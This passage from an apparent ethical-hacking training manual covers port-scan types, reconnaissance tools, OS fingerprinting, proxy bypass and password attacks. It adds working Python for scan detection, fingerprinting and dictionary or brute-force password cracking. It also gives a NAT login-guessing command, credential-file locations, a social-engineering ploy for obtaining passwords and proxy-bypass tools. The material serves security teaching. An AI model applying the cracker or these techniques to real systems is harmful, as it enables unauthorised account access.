determine which ports are open. Neither UDP packets nor the ICMP errors are
guaranteed to arrive, so UDP scanners of this sort must also implement retransmission
of packets that appear to be lost (or you will get a bunch of false positives).
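The scan signatures described in 3.22.1 through 3.22.8 are what a defender looks for in captured traffic. The following is an added example, not code from the manual or from any tool it names: it takes constructed packet records (source, destination, protocol, destination port, TCP flag set) and reports which sources have probed many ports on one host with the same half-open, connect(), FIN, NULL, XMAS, ACK or UDP pattern. The port threshold is an assumed tuning value.

```python
"""Classify port-scan patterns in packet records (added example, not from the manual).

Each record is a constructed tuple: (src_ip, dst_ip, proto, dst_port, tcp_flags).
tcp_flags is a set of flag names for TCP records and None for UDP records.
"""
from collections import defaultdict

ALL_TCP_FLAGS = frozenset({"FIN", "SYN", "RST", "PSH", "ACK", "URG"})

# Distinct destination ports one source must hit on one host, with the same packet
# pattern, before it is reported. An assumed tuning value, not a standard.
PORT_THRESHOLD = 8

SCAN_NAMES = {
    "SYN": "SYN (half-open) scan",
    "CONNECT": "TCP connect() scan",
    "FIN": "FIN scan",
    "NULL": "NULL scan",
    "XMAS": "XMAS scan",
    "ACK": "ACK scan",
    "UDP": "UDP scan",
}


def flag_pattern(flags):
    """Map one TCP segment's flag set to the scan technique it resembles."""
    flags = frozenset(flags)
    if not flags:
        return "NULL"                    # no bits set at all
    if flags == ALL_TCP_FLAGS:
        return "XMAS"                    # every flag lit up
    if len(flags) == 1 and next(iter(flags)) in ("SYN", "FIN", "ACK"):
        return next(iter(flags))         # lone SYN, FIN or ACK
    return "OTHER"                       # ordinary traffic: SYN+ACK, PSH+ACK, RST, ...


def classify_scans(records, threshold=PORT_THRESHOLD):
    """Return [(src, dst, scan_name, distinct_ports)] for every suspicious source."""
    ports = defaultdict(set)             # (src, dst, pattern) -> destination ports seen
    for src, dst, proto, dport, flags in records:
        if proto == "tcp":
            pattern = flag_pattern(flags)
        elif proto == "udp":
            pattern = "UDP"              # empty datagrams sprayed over many ports
        else:
            continue
        ports[(src, dst, pattern)].add(dport)

    findings = []
    for (src, dst, pattern), dports in sorted(ports.items()):
        if pattern == "OTHER" or len(dports) < threshold:
            continue
        syn_ports = ports.get((src, dst, "SYN"), set())
        ack_ports = ports.get((src, dst, "ACK"), set())
        if pattern == "ACK" and len(dports & syn_ports) >= threshold:
            continue                     # these ACKs complete SYNs; counted under SYN below
        if pattern == "SYN" and len(dports & ack_ports) * 2 >= len(dports):
            pattern = "CONNECT"          # handshakes were completed: connect() scan
        findings.append((src, dst, SCAN_NAMES[pattern], len(dports)))
    return findings


def sample_records():
    """Constructed packet records (not captured traffic) covering each scan type."""
    recs = []
    target = "10.0.0.10"
    # A normal client: repeated full handshakes with a single service port.
    for _ in range(20):
        recs += [("10.0.0.8", target, "tcp", 443, {"SYN"}),
                 ("10.0.0.8", target, "tcp", 443, {"ACK"}),
                 ("10.0.0.8", target, "tcp", 443, {"PSH", "ACK"})]
    # Half-open scan: lone SYNs that the scanner never follows with an ACK.
    recs += [("10.0.0.5", target, "tcp", p, {"SYN"}) for p in range(20, 41)]
    # connect() scan: every SYN is followed by the handshake-completing ACK.
    for p in range(8000, 8012):
        recs += [("10.0.0.9", target, "tcp", p, {"SYN"}),
                 ("10.0.0.9", target, "tcp", p, {"ACK"})]
    # NULL scan on one host and XMAS scan on another from the same source.
    recs += [("10.0.0.6", target, "tcp", p, set()) for p in range(1, 11)]
    recs += [("10.0.0.6", "10.0.0.11", "tcp", p, ALL_TCP_FLAGS) for p in range(1, 11)]
    # UDP scan: empty datagrams to a run of ports.
    recs += [("10.0.0.7", target, "udp", p, None) for p in range(53, 70)]
    return recs


if __name__ == "__main__":
    for src, dst, name, count in classify_scans(sample_records()):
        print(f"{src} -> {dst}: {name} ({count} ports)")
```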
3.23.1 Tool: ipEye, IPSecScan
Figure 3.15
IPSecScan is a tool that can scan either a single IP address or a range of IP addresses
looking for systems that are IPSec enabled.
3.23.2 Tool: NetScan Tools Pro 10
Figure 3.16
NetScanTools Pro is an ideal tool for the network security, network administration,
network training, internet forensics and law enforcement internet crimes fields.
**Automated tools are started interactively by the user. By "automated" we mean that
several tools are used to do research, and the results are then presented in your web
browser.
NetScanTools Pro Benefits
• Saves time when you need to gather information about Internet or local LAN
  users, network devices, IP addresses, ports, and many other network specifics.
• Removes the guesswork from Internet investigation by automating research
  requiring multiple network tools.
• Produces clear, concise results reports in the format that you prefer: a web page
  or a file easily imported by a spreadsheet.
• Greatly enhances many standard network tools.
Multiple Solutions in one package
A Network Information Gathering, Reconnaissance and Discovery Solution
• Gather information from DNS. Use DNS checking and testing tools such as
  NSLOOKUP or Dig along with any of 43 record query options. Check zone
  transfers with List Domain or Dig w/AXFR. DNS Validation (IP to Hostname to IP
  mapping check) is found in both the NSLOOKUP and HyperTrans tools. Test
  Default Servers to verify that all name servers that your computer talks with are
  responding.
• Find information about domain name registrations and IPv4 address
  assignments fast with our advanced whois and rwhois query tool that features
  automatic whois server selection.
• Locate active devices in an IPv4 range using our ping sweep utility called
  NetScanner. It combines a ping sweep utility with DNS queries and NetBIOS
  queries.
• Locate active devices in your local network segment using ARP Scan. All
  active IPv4 devices must respond to ARP request packets.
• Find visible and hidden shares in a Microsoft Windows Domain. NetBIOS
  share detection shows visible and hidden shares. It also does a 'writable' share
  test to find shares subject to attacks by worms and viruses.
• Find open TCP or UDP ports. The Port Scanner tool uses several different
  methods to determine if a TCP or UDP port is active (used by a service or
  daemon) on a target machine.
• Test DHCP Server offerings and find rogue DHCP Servers. DHCP Server
  Discovery finds rogue or misconfigured DHCP servers.
• Find the route packets are taking from your machine to a target machine.
  Traceroute includes the firewall-penetrating TCP traceroute plus standard ICMP
  and UDP traceroute methods.
• Validate an Email Address. Email Address Validation assists in verifying an
  email address status.
• Test an SMTP Server by sending mail and checking for an Open Relay.
  Open SMTP Relay Checking assists in showing configuration issues with SMTP
  servers.
• Capture Packets from the network. Packet Viewer captures packets going
  through your wired ethernet card. This program has the ability to preserve packet
  data for future analysis and export packet captures to other programs like
  Wireshark.
• Gather data using SNMP. SNMPv1/v2c tools include walk, get, set and several
  advanced queries such as remote ARP cache, remote listening ports and more.
  A new SNMP Dictionary Attack tool uses a common password dictionary to
  guess the community name of an SNMP-enabled device.
• Find and keep track of IP/MAC Address Mappings. IP and MAC address
  associations found using NetScanner, ARP, SNMP, and NetBIOS can be
  automatically updated and maintained in the IP/MAC address management
  database.
• Numerous useful utilities like Subnet Calculator, TTCP for network speed
  checking, Ping, ARP Ping, and safe URL web page capture with obscured URL
  decoding.
• Map Network Switches. The optional Manage Switch Port Mapping tool works
  with many SNMP-enabled managed ethernet network switches.
3.23.3 Tool: NMap (Network Mapper)
Figure 3.17
Nmap was the source of strange new scan patterns that started being detected by the
SHADOW intrusion-detection systems located throughout the Internet. The reported
traffic varies from incident to incident. However, it can generally be categorized into two
distinct groups. The first group is denoted as the "random scan" category. This scan’s
signature is characterized by SYN packets sent to apparently random destination (or
service) ports over some discrete range of values. At the end of these scans we typically
see several packets to high-numbered TCP and UDP ports, followed by a small number
of packets to a common destination port.
The second class of traffic is called (for the lack of a better term) "exploits plus".
Although the signature of these probes can vary with respect to the service ports
accessed, the basic characteristics closely resemble the random scan discussed above.
3.24 Active Stack Fingerprinting___________________
• Fingerprinting is done to determine the remote OS.
• It allows the attacker to leave a smaller footprint and have a greater chance to succeed.
• It is based on the fact that various OS vendors implement the TCP stack differently.
• Specially crafted packets are sent to the remote OS and the response is noted. This is
  compared with a database to determine the OS.
3.25 Passive Fingerprinting_______________________
• Passive fingerprinting is also based on the differing implementations of the stack
  and the various ways an OS responds.
• However, instead of relying on scanning the target host, passive fingerprinting
  captures packets from the target host and studies them for tell-tale signs that can
  reveal the OS.
• Passive fingerprinting is less accurate than active fingerprinting.
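Sections 3.24 and 3.25 describe fingerprinting as comparing observed stack behaviour with a signature database. The following is an added example, not code from the manual or from any fingerprinting tool: it scores a captured SYN's TTL, window size and DF bit against a small illustrative signature table (assumed values, not a vendor database) and attaches a confidence, which is where the lower accuracy of the passive approach shows up. The SYN observations are constructed.

```python
"""Passive OS fingerprint from a captured SYN (added example, not from the manual).

The signature table is illustrative: a handful of widely cited initial-TTL and default
window values, assumed for this example rather than taken from a fingerprint database.
"""

# Common initial TTL values; a sender's TTL is decremented once per router hop.
INITIAL_TTLS = (32, 64, 128, 255)

# Illustrative signatures (assumed): initial TTL, TCP window advertised in the
# SYN, and whether the Don't Fragment bit is set.
SIGNATURES = [
    {"os": "Linux 2.6-era", "ttl": 64, "window": 5840, "df": True},
    {"os": "Windows XP/2003", "ttl": 128, "window": 65535, "df": True},
    {"os": "Windows 9x", "ttl": 32, "window": 8192, "df": False},
    {"os": "Solaris / Cisco IOS", "ttl": 255, "window": 8760, "df": True},
]


def guess_initial_ttl(observed_ttl):
    """Return (initial_ttl, hops): the smallest common initial TTL at or above the
    observed value, and how many hops away the sender therefore is."""
    for initial in INITIAL_TTLS:
        if observed_ttl <= initial:
            return initial, initial - observed_ttl
    return None, None


def passive_fingerprint(syn):
    """syn: {'ttl': int, 'window': int, 'df': bool} read from a captured SYN segment.

    Scores every signature (TTL and window weigh 2 each, DF weighs 1) and reports the
    best match with a confidence label, since a passive observer only sees what the
    host happens to send and cannot probe for more."""
    initial, hops = guess_initial_ttl(syn["ttl"])
    best = (-1, None)
    for sig in SIGNATURES:
        score = 0
        score += 2 if sig["ttl"] == initial else 0
        score += 2 if sig["window"] == syn["window"] else 0
        score += 1 if sig["df"] == syn["df"] else 0
        if score > best[0]:
            best = (score, sig["os"])
    score, os_name = best
    confidence = "high" if score == 5 else ("medium" if score >= 3 else "low")
    return {"os": os_name, "initial_ttl": initial, "hops": hops,
            "score": score, "confidence": confidence}


# Constructed SYN observations, not real captures.
SAMPLE_SYNS = {
    "host-a": {"ttl": 58, "window": 5840, "df": True},    # Linux-like, 6 hops away
    "host-b": {"ttl": 118, "window": 64240, "df": True},  # Windows-like TTL, window not in table
    "host-c": {"ttl": 30, "window": 8192, "df": False},   # Windows 9x-like, 2 hops away
}

if __name__ == "__main__":
    for name, syn in SAMPLE_SYNS.items():
        print(name, passive_fingerprint(syn))
```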
3.26 Hacking Tool: Cheops_______________________
Here are some of the features currently integrated into cheops:
Multiple Pages: Organize your network into convenient pages so you can place relevant
portions together, and quickly go to a specific area or specific network.
OS Detection: Cheops can optionally determine the OS of hosts on the network, selecting
appropriate icons for them.
Find: Quickly find hosts on a large network.
Mapping: Cheops can show you the routes taken to access areas of your network. (This
feature is designed for larger networks, with routers, subnets, etc. If you only have a
simple LAN where all your hosts are connected with hubs, then it'll just draw a bunch of
lines between you and the other computers.) This mapping not only makes hierarchy
clearer, but can show unusual routing issues, like this unusual router triangle.
Unfortunately, you have to place the machines yourself, but cheops handles the
interconnections :)
Services: Right-clicking on a host quickly shows you a list of common services it
supports, and rapid, easy access to them.
Multiple views: For large networks, you can view the network with smaller icons, or even
as a simple list of networks. Layout is arrangeable by domain, hostname, IP address,
etc., and searching is supported in both iconic and list formats.
Generalized Port Scanner: Cheops includes a generalized TCP port scanner to see what
ports on your network are in use.
Service probing: Retrieve version information for certain services, to be sure any given
host is up-to-date with the latest revision of its services.
Highly Configurable: Cheops is highly configurable both through text-based
configuration files and through a graphical "Options" dialog box.
Integrated SNMP support: Cheops includes a simple integrated SNMP browser, including
write capability, using the UCD SNMP library. Cheops also supports a plugin interface,
which includes support for SNMP plugins, a similar concept to those of HP OpenView.
Monitoring support: Cheops can monitor your critical servers, and immediately notify you
through its event log, standard e-mail, and soon paging, when things go wrong. Know
exactly what's up or down, and just when problems occur.
3.28 Proxy Servers______________________________
A proxy is a network computer that can serve as an intermediary for connections with
other computers. Proxies are usually used for the following purposes:
• As a firewall, a proxy protects the local network from outside access.
• As an IP-address multiplexer, a proxy allows a number of computers to connect to the
  Internet when only one IP address is available.
• Proxy servers can be used (to some extent) to anonymize web surfing.
• Specialized proxy servers can filter out unwanted content, such as ads or
  'unsuitable' material.
• Proxy servers can afford some protection against hacking attacks.
3.28.1 LIST OF FREE PROXIES ON WEB
IP address:port | Anonymity level | Checked time | Country
3.29 Anonymizers_______________________________
Anonymizers are services that help make your own web surfing anonymous.
The first anonymizer developed was Anonymizer.com created in 1997 by Lance Cottrell.
An anonymizer removes all the identifying information from a user’s computer while the
user surfs the Internet, thereby ensuring the privacy of the user. Whenever you surf the
Web, you leave yourself open to being snooped upon by web sites. They can track your
online travels, know what operating system and browser you're running, find out your
machine name, peer into your clipboard, uncover the last sites you've visited, examine
your history list, delve into your cache, examine your IP address and use that to learn
basic information about you such as your geographic location, and more.
3.30 Bypassing Firewall using Httptunnel___________
Httptunnel creates a bidirectional virtual data path tunneled in HTTP requests. The
requests can be sent via an HTTP proxy if so desired.
Figure 3.18
3.30.1 Hacking Tool: HTTPort
Enter your proxy address and port here. “Your proxy” is the one that you use for surfing,
and which actually blocks you from the Internet. If you don’t know what your proxy is,
examine your browser settings.
HTTPort allows you to bypass an HTTP proxy that is blocking you from the Internet.
With HTTPort you may use the following software (just a sample list, not limited to!)
from behind an HTTP proxy: e-mail, IRC, ICQ, news, FTP, AIM, any SOCKS-capable
software, etc.
Figure 3.19
Figure 3.20
3.31 Summary__________________________________
• War dialing is the term given to accessing a network illegally over a compromised
  phone line. Popular tools include THC war dialer and PhoneSweep.
• Scanning is a method adopted by administrators and crackers alike to discover
  more about a network.
• There are various scan types: SYN, FIN, Connect, ACK, RPC, Inverse Mapping,
  FTP Bounce, Idle Host, etc. The use of a particular scan type depends on the
  objective at hand.
• Ways to subvert a standard connection include HTTPort, HTTP tunneling, using
  proxies, SOCKS chains and anonymizers.
Chapter-4
Operating System Attacks
Session Objectives:
At the end of this Session, you will be able to understand –
Windows Vulnerabilities
Password Vulnerabilities
Technical Password Vulnerabilities
Cracking Passwords
Password Cracking Software
Dictionary Attacks
Brute-Force Attacks
Cracking Passwords with L0phtCrack
Obtaining the Password Hashes
General Password-Hacking Countermeasures
Linux Vulnerabilities
Introduction____________________________________
The Microsoft Windows OS family (with such versions as NT, 2000, XP, and Server
2003) is the most widely used OS in the world. On the other side, it’s also the most
widely hacked. Is this because Microsoft doesn’t care as much about security as other
OS vendors? The short answer is no. Sure, numerous security flaws were overlooked —
especially in the Windows NT days — but because Microsoft products are so pervasive
throughout networks, Microsoft is the easiest vendor to pick on, and often it’s Microsoft
products that end up in the crosshairs of hackers. This is the same reason that you see
so many vulnerability alerts on Microsoft products. The one positive about hackers is
that they’re driving the requirement for better security!
Many security flaws in the headlines aren’t new. They’re variants of vulnerabilities that
have been around for a long time in UNIX and Linux, such as the RPC vulnerabilities
that the Blaster worm used. You’ve heard the saying “the more things change, the more
they stay the same.” That applies here, too. Most Windows attacks would be prevented if
patches were properly applied. Thus, poor security management is often the real reason
Windows attacks are successful, yet Microsoft takes the blame and must carry the
burden.
4.1 Windows Vulnerabilities_______________________
Given the general ease of use of Windows, its enterprise-ready Active Directory service,
and the feature-rich .NET development platform, many organizations have moved to the
Microsoft platform for their networking needs. Many businesses — especially the small
to medium-sized ones — depend solely on the Windows OS for network usage. Many
large organizations run critical servers such as Web servers and database servers on
the Windows platform. If security vulnerabilities aren’t addressed and managed
properly, they can bring a network or an entire organization to its knees. When Windows
and other Microsoft software are attacked — especially by a widespread Internet-based
worm or virus — hundreds of thousands of organizations and millions of computers are
affected. Many well-known attacks against Windows can lead to
• Leakage of confidential information, including files being copied and credit card
  numbers being stolen
• Passwords being cracked and used to carry out other attacks
• Systems taken completely offline by DoS attacks
• Entire databases being corrupted or deleted
Password hacking is one of the easiest and most common ways that hackers gain
unauthorized computer or network access. Although strong passwords that are
difficult to crack (or guess) are easy to create and maintain, users often neglect this.
Therefore, passwords are one of the weakest links in the information-security chain.
Passwords rely on secrecy. After a password is compromised, its original owner isn’t the
only person who can access the system with it. That’s when bad things start happening.
Hackers have many ways to obtain passwords. They can glean passwords simply by
asking for them or by looking over the shoulders of users as they type them in. Hackers
can also obtain passwords from local computers by using password-cracking software.
To obtain passwords from across a network, hackers can use remote cracking utilities or
network analyzers.
4.2 Password Vulnerabilities______________________
When you balance the cost of security and the value of the protected information, the
combination of user ID and secret password is usually adequate.
However, passwords give a false sense of security. The bad guys know this and attempt
to crack passwords as a step toward breaking into computer systems.
Organizational password vulnerabilities: It’s human nature to want convenience. This
makes passwords one of the easiest barriers for an attacker to overcome. Almost 3
trillion (yes, trillion, with a t and 12 zeros) eight-character password combinations are
possible using the 26 letters of the alphabet and the numerals 0 through 9. However,
most people prefer to create passwords that are easy to remember. Users like to use
such passwords as “password,” their login name, or a pet’s name.
Unless users are educated and reminded about using strong passwords, their
passwords usually are
• Weak and easy to guess.
• Seldom changed.
• Reused for many security points. When bad guys crack a password, they try to
  access other systems with the same password and user name.
• Written down in non-secure places. The more complex a password is, the more
  difficult it is to crack. However, when users create more complex passwords,
  they’re more likely to write them down. Hackers can find these passwords and
  use them against you.
4.3 Technical password vulnerabilities______________
You can often find these serious technical vulnerabilities after exploiting organizational
password vulnerabilities:
• Weak password-encryption schemes. Hackers can break weak password storage
  mechanisms by using cracking methods that I outline in this chapter. Many
  vendors and developers believe that passwords are safe from hackers if they
  don’t publish the source code for their encryption algorithms. Wrong! A persistent,
  patient hacker can usually crack this security by obscurity fairly quickly.
  After the code is cracked, it is soon distributed across the Internet and becomes
  public knowledge.
• Password-cracking utilities take advantage of weak password encryption. These
  utilities do the grunt work and can crack any password, given enough time and
  computing power.
• Software that stores passwords in memory and easily accessed databases.
• End-user applications that display passwords on the screen while typing.
4.4 Cracking Passwords__________________________
Password cracking is one of the most enjoyable hacks for the bad guys. It fuels their
sense of exploration and desire to figure things out. You may not have a burning desire
to explore everyone’s passwords, but it helps to approach password cracking with this
thinking. So where should you start hacking the passwords on your systems? Generally
speaking, any user’s password works. After you obtain one password, you can obtain
others — including administrator or root passwords. Administrator passwords are the
pot of gold. With unauthorized administrative access, you can do virtually anything on
the system. When looking for your organization’s password vulnerabilities, I recommend
first trying to obtain the highest level of access possible (such as administrator) through
the most discreet method possible. That’s what the hackers do.
4.4.1 Cracking passwords the old-fashioned way
A hacker can use low-tech methods to crack passwords. These methods include using
social-engineering techniques, shoulder surfing, and simply guessing passwords from
information that you know about the user.
4.4.2 Social engineering
The most popular low-tech method is social engineering. Social engineering takes
advantage of the trusting nature of human beings to gain information that can later be
used maliciously.
4.4.2.1 Techniques
To obtain a password through social engineering, you just ask for it. For example, you
can simply call a user and tell him that he has some important-looking e-mails stuck in
the mail queue and you need his password to log in and free them up. This is how
hackers try to get the information! If your colleague gives you his password, make sure
that he changes it.
4.4.2.2 Countermeasures
User awareness is the best defense against social engineering. Train users to spot
attacks (such as suspicious phone calls or deceitful e-mails) and respond effectively.
Their best response is to not give out any information and to alert the appropriate
information-security officer in the organization to see whether the inquiry is legitimate
and whether a response is necessary. For this defense to be successful, the
organization must enforce a security policy and provide ongoing security-awareness
training to users.
4.4.3 Shoulder surfing
Shoulder surfing is an effective, low-tech password hack.
4.4.3.1 Techniques
To mount this attack, you must be near the user and not look obvious. Simply watch
either the user’s keyboard or screen when logging in. A hacker with a good eye may
watch whether the user is glancing around his desk for either a reminder of the
password or the password itself.
4.4.3.2 Countermeasures
Encourage users to be aware of their surroundings and not enter their passwords when
they suspect that someone is looking over their shoulder. Instruct users that if they
suspect someone is looking over their shoulder while they’re logging in, they should
politely ask the person to look away.
4.5 Inference
Inference is simply guessing passwords from information you know about users — such
as their date of birth, favorite television show, and phone numbers. It sounds silly, but
you can determine passwords by guessing!
The best defense against an inference hack attack is to educate users about creating
secure passwords that do not include information that can be associated with them. You
can’t easily enforce this practice with technical controls, so you need a sound security
policy and ongoing awareness training to remind users of the importance of secure
password creation.
4.5.1 Weak authentication
Hackers can obtain — or simply avoid having to use — passwords by taking advantage
of older operating systems, such as Windows 9x and Me. These operating systems
don’t require passwords to log in.
4.5.2 Bypassing authentication
On a Windows 9x or similar workstation that’s prompting for a password, you can press
Esc on the keyboard to get right in.
After you’re in, you can find other passwords stored in such places as dial-up
networking connections and screen savers. These weak systems can serve as trusted
machines — meaning that it’s assumed that they’re secure — and provide good
launching pads for network-based password attacks as well.
4.5.3 Countermeasures
The only true defense against this hack is to not use operating systems that employ
weak authentication. To eliminate this vulnerability, upgrade to Windows XP, or use
Linux or the flavors of UNIX, including Mac OS X.
More modern authentication systems (such as Kerberos, which is used in newer
versions of Windows), directory services (such as Novell’s eDirectory), and
network-based e-mail systems (such as Exchange) encrypt user passwords or don’t
communicate the passwords across the network. These measures create an extra layer
of security, but these authentication systems still have some vulnerability, which will be
discussed shortly.
4.6 High-Tech Password Cracking_________________
High-Tech Password Cracking involves using a program that tries to guess a password
by determining all possible password combinations. These high-tech methods are
mostly automated after you access the computer and password database files.
4.7 Password Cracking Software___________________
You can try to crack your organization’s operating-system and Internet application
passwords with various password cracking tools:
• LC5 (previously called L0phtcrack) can sniff out password hashes from the wire.
  Go to www.atstake.com/research/lc
• NetBIOS Auditing Tool (NAT) specializes in network-based password attacks. Go
  to www.securityfocus.com/tools/543
• Chknull (www.phreak.org/archives/exploits/novell) for Novell NetWare password
  testing
These tools require physical access on the tested computer:
• John the Ripper (www.openwall.com/john)
• pwdump2 (razor.bindview.com/tools/desc/pwdump2_readme.html)
• Crack (coast.cs.purdue.edu/pub/tools/unix/pwdutils/crack)
• Brutus (www.hoobie.net/brutus)
• Pandora (www.nmrc.org/project/pandora)
• NTFSDOS Professional (www.winternals.com)
Various other handy password tools exist, such as
• GetPass for decrypting login passwords for Cisco routers
  (www.boson.com/promo/utilities/getpass/getpass_utility.htm)
• Win Sniffer for capturing FTP, e-mail, and other types of passwords off the
  network
• Cain and Abel for capturing, cracking, and even calculating various types
  of passwords on a plethora of systems (www.oxid.it/cain.html)
Password-cracking utilities take a set of known passwords and run them through a
password-hashing algorithm. The resulting hashes or an encrypted form of a data set
are then compared at lightning speed to the password hashes extracted from the
original password database. When a match is found between the newly generated hash
and the hash in the original database, the password has been cracked. It’s that simple.
Other password-cracking programs simply attempt to log on using a predefined set of
user IDs and passwords. In fact, NAT can do just that. NAT takes advantage of some
known weaknesses in Microsoft’s Server Message Block (SMB) protocol, which is
used for file and print sharing.
Try running NAT in a real-world scenario. Simply download NAT from the preceding
address, and extract it to a temporary directory on your hard drive.
NAT comes with some predefined usernames and passwords in the userlist.txt and
passlist.txt files, but you can modify them or add your own. For a quick test of a
Windows NT or 2000 machine across the network, enter this basic NAT command at a
command prompt:
nat -u userlist.txt -p passlist.txt IP_address_of_the_computer_you're_testing
Figure 4.1 shows the output of my test server when I ran NAT against it. NAT used the
default password list to crack the administrator password in just a few seconds. If you
don’t have any luck, consider using one of the dictionary files listed in the next section.
Just give the test some time. If you use one of the larger lists, the process may take
quite a while.
Figure 4.1
Passwords are typically stored on a computer in hashed form, using a one-way hash
algorithm such as the traditional DES-based crypt or MD5. A hashed password is a
fixed-length string, and unless a per-user salt is mixed in, the same password always
produces exactly the same string, which is why one cracked hash can open every
account that shares it. These hashes are irreversible for all practical purposes, so
passwords cannot be decrypted; they can only be guessed, with each guess hashed and
compared.
Password storage locations vary by operating system:
4.8 Windows usually stores passwords in these locations:
• Security Accounts Manager (SAM) database
(c:\winnt\system32\config)
• Active Directory database file that’s stored locally or spread across domain controllers
(ntds.dit)
Windows sometimes stores passwords in either a backup of the SAM file in the
c:\winnt\repair directory or on an emergency repair disk.
Some Windows applications store passwords in the Registry or as plaintext files on the
hard drive!
4.9 Linux and other UNIX variants typically store passwords in these files:
• /etc/passwd (readable by everyone)
• /etc/shadow (accessible by root only)
• /etc/security/passwd (accessible by root only)
• /.secure/etc/passwd (accessible by root only)
Two high-tech password-cracking methods are dictionary attacks and brute-force attacks.
4.10 Dictionary attacks___________________________
Dictionary attacks against passwords quickly compare a set of words, including many
common passwords, against a password database. The dictionary itself is a text file with
thousands of words, typically listed in alphabetical order. For instance, suppose that you
have a dictionary file that you downloaded from one of the sites in the following list. The
English dictionary file at the Purdue site contains one word per line, starting with 10th,
1st ... all the way to zucchini and zygote.
Many password-cracking utilities can use a separate dictionary that you create or
download from the Internet. Here are some popular sites that house dictionary files and
other miscellaneous word lists:
ftp://ftp.cerias.purdue.edu/pub/dict
ftp://ftp.ox.ac.uk/pub/wordlists
packetstormsecurity.nl/Crackers/wordlists
www.outpost9.com/files/WordLists.html
Most dictionary attacks are good for weak (easily guessed) passwords. However, some
special dictionaries have common misspellings of words such as pa$$w0rd (password)
and 5ecur1ty (security), non-English words, and thematic words from religions, politics,
or Star Trek.
4.11 Brute-force attacks__________________________
Brute-force attacks can crack any password, given sufficient time. Brute-force attacks try
every combination of numbers, letters, and special characters until the password is
discovered. Many password-cracking utilities let you specify such testing criteria as the
characters and password length to try.
A brute-force test can take quite a while, depending on the number of accounts, their
associated password complexities, and the speed of the computer that's running the
cracking software.
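As an added example (not from the original text and not code from any of the tools listed above), the following Python script demonstrates the compare-the-hashes loop in all three flavours described in this chapter: a plain dictionary attack, a hybrid attack that applies the look-alike substitutions of the "special dictionaries" (pa$$w0rd, 5ecur1ty), and an incremental brute-force attack. The password database, the wordlist and the user names are constructed for the demo, and SHA-256 stands in for the crypt/DES or MD5 schemes the text mentions; the cracking logic does not depend on which hash is used. Two of the sample accounts share an unsalted password to show why one candidate hash is compared against every account with the same salt.

```python
import hashlib
import itertools
import string


def hash_password(password, salt=""):
    """One-way hash of salt+password. SHA-256 stands in for the DES/MD5
    crypt schemes; the cracking loop below is the same for any of them."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed sample "password database": user -> (salt, hex digest).
SAMPLE_DB = {
    "alice": ("", hash_password("zucchini")),       # plain dictionary word
    "bob":   ("", hash_password("5ecur1ty")),       # leet-mangled dictionary word
    "carol": ("", hash_password("zucchini")),       # same password as alice, no salt
    "dave":  ("x7", hash_password("a1!", "x7")),    # short random string, salted
}

# Constructed stand-in for a downloaded wordlist (one word per line).
WORDLIST = ["10th", "1st", "password", "security", "zucchini", "zygote"]

# Look-alike substitutions that cracking tools try automatically.
LEET = {"a": "@4", "e": "3", "i": "1!", "o": "0", "s": "$5", "t": "7"}

CHARSET = string.ascii_lowercase + string.digits + "!@#$%"


def mangle(word):
    """Yield the word plus every leet and case variant of it (hybrid attack)."""
    options = [[c] + list(LEET.get(c, "")) for c in word]
    seen = set()
    for combo in itertools.product(*options):
        cand = "".join(combo)
        for variant in (cand, cand.upper(), cand.capitalize()):
            if variant not in seen:
                seen.add(variant)
                yield variant


def _index_by_salt(db):
    """Group digests by salt: one candidate hash per salt is compared against
    every account sharing that salt, which is why unsalted hashes crack in bulk."""
    by_salt = {}
    for user, (salt, digest) in db.items():
        by_salt.setdefault(salt, {}).setdefault(digest, []).append(user)
    return by_salt


def _try_candidates(by_salt, candidates):
    cracked = {}
    for cand in candidates:
        for salt, digests in by_salt.items():
            for user in digests.get(hash_password(cand, salt), []):
                cracked.setdefault(user, cand)
    return cracked


def dictionary_attack(db, wordlist):
    """Hash every wordlist entry and its mangled variants; return user -> password."""
    return _try_candidates(_index_by_salt(db),
                           (cand for word in wordlist for cand in mangle(word)))


def brute_force(db, charset, max_len):
    """Try every string over charset up to max_len; cost grows as len(charset)**length."""
    candidates = ("".join(c) for length in range(1, max_len + 1)
                  for c in itertools.product(charset, repeat=length))
    return _try_candidates(_index_by_salt(db), candidates)


if __name__ == "__main__":
    print(dictionary_attack(SAMPLE_DB, WORDLIST))   # alice and carol: zucchini, bob: 5ecur1ty
    print(brute_force(SAMPLE_DB, CHARSET, 3))       # dave: a1!
```

The dictionary pass finds the three accounts whose passwords are a word or a mangled word, and alice and carol fall together because their unsalted digests are identical. The brute-force pass over three positions of a 41-character alphabet costs about 70,000 hashes per salt and recovers only the short password; every extra position multiplies that by 41, which is the cost curve the text is describing.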
Smart hackers attempt logins slowly or at random times so the failed login attempts
aren’t as predictable or obvious in the system log files. Some malicious users may even
call the IT help desk to attempt a reset of the account they’ve just locked out. This
social-engineering technique could be a major issue, especially if the organization has
no or minimal mechanisms in place to verify that locked-out users are who they say they
are.
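The low-and-slow behaviour described above is exactly what a burst-only lockout threshold misses. The following Python script, added here as an example and not part of the original text, classifies failed-logon sources from constructed sshd syslog lines: a source that fails five or more times inside a minute is the classic burst, a source that spreads a handful of failures across many hours and many usernames is the slow pattern, and a single failure is treated as benign. The hostnames, addresses, usernames and timestamps are all made up, and the year is assumed because syslog lines carry none.

```python
import re
from collections import defaultdict
from datetime import datetime

# Matches the standard OpenSSH failure line; "invalid user" appears for unknown names.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Constructed sample log: one noisy burst, one slow spray, one user typo, one success.
SAMPLE_LOG = """\
Mar  3 01:02:11 web1 sshd[4011]: Failed password for root from 203.0.113.7 port 51012 ssh2
Mar  3 01:02:12 web1 sshd[4011]: Failed password for root from 203.0.113.7 port 51012 ssh2
Mar  3 01:02:14 web1 sshd[4013]: Failed password for root from 203.0.113.7 port 51014 ssh2
Mar  3 01:02:15 web1 sshd[4013]: Failed password for root from 203.0.113.7 port 51014 ssh2
Mar  3 01:02:17 web1 sshd[4015]: Failed password for root from 203.0.113.7 port 51016 ssh2
Mar  3 01:02:19 web1 sshd[4015]: Failed password for admin from 203.0.113.7 port 51016 ssh2
Mar  3 02:15:40 web1 sshd[4120]: Failed password for invalid user admin from 198.51.100.23 port 40022 ssh2
Mar  3 05:41:02 web1 sshd[4388]: Failed password for invalid user backup from 198.51.100.23 port 40180 ssh2
Mar  3 09:07:55 web1 sshd[4602]: Failed password for invalid user oracle from 198.51.100.23 port 40311 ssh2
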